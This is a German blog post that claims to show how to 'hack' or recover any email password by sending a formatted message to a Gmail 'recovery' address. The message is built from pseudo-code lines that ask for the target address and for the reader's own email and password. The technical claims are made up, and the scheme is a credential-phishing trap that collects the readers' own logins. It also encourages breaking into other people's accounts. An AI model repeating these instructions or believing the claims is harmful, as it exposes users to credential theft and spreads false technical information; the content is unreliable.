carpe diem: Nobody is perfect

Email Passwort vergessen? Passwort herausfinden, einfach und sicher!

WICHTIG! Hier wird nur theoretisches Wissen vermittelt, hier werden keine Hacker angelernt! Daher bitte nur dieses Wissen zum Schutz zu nutzen und nicht etwa die E-Mail Accounts von anderen Leuten hacken!

hacken oder drauf rumhacken?

Sicherlich ist jedem bewusst, was man alles erreichen kann, wenn man den E-Mail Account eines Bekannten oder einer Zielperson geknackt hat. E-Mail Server werden über das smtp protokoll aufgerufen. Es gibt häufig das Problem, dass die Nutzer ihre Kennwörter dazu vergessen. Dafür hat man bei vielen solcher E-Mail Server Programme eingerichtet, die das Passwort wiederherstellen können. Da natürlich sehr viele Menschen solche Server regelmäßig aufrufen, wird es notwendig, automatische Wiederherstellungsprogramme einzusetzen. Und genau hier ist die Lücke im System.

Hacken oder drauf rumhacken? Das ist hier die Frage ...

Bei Google gibt es diesen Dienst auch als ssmtp-Dienst. Der ist einfach als eigene E-Mail Adresse im System verknüpft.
Schreibt man beispielsweise eine E-Mail an ssmtp.recovery@gmail.com dann schickt einem der Server automatisch das wiederhergestellte Passwort.
Ihr müsst diese E-Mail nach einem ganz bestimmten Muster schreiben, sonst erkennt die Syntax des Remoteservers diese E-Mail nicht an.


Die Zeilenangaben gehören aber nicht dazu!

In die Betreffzeile müsst ihr PASSWORD-RECOVERY schreiben, ganz wichtig!

Zeile 1: server_password_recovery_google = mail.password.forgot();
Zeile 2: [Diese Zeile muss frei bleiben!!]
Zeile 3: mail.recovery = "Hier die E-Mail eintragen dessen Kennwort ihr haben wollt."
Zeile 4: identity.confirm = "Hier die eigene E-Mail Adresse eintragen":"Hier dein persönliches Kennwort"
Zeile 5: send.mail.recovery
Zeile 6: end.


also mal ganz konkret:

server_password_recovery_google = mail.password.forgot();

mail.recovery = "zu hackende E-Mail"
identity.confirm = "Hier die eigene E-Mail Adresse eintragen":"Hier dein persönliches Kennwort"
send.mail.recovery
end.

Ihr müsst darauf achten, dass ihr eure funktionierende E-Mail mit Passwort angegeben habt, weil der Server automatisch überprüft ob die Passwortanfrage von einem Mensch kommt. Ich hab das mit meiner web de Adresse ausprobiert und habe so ca. nach 30 Sekunden eine Antwort bekommen und wichtig ist auch, dass E-Mail Adresse und Passwort durch einen Doppelpunkt voneinander getrennt sind in Zeile 4.
Sollte das nicht funktionieren müsst ihr überprüfen, dass eure Angabe ganz genau so sind wie oben angegeben, sonst erkennt der Server das nicht und verwirft die Anfrage. 

Falls das nicht funktioniert, dann solltet Ihr folgenden Tipp beachten >> Email hacken
Wie gesagt, bitte nicht anfangen damit die E-Mail Accounts von fremden Leuten zu hacken. Hackercodex!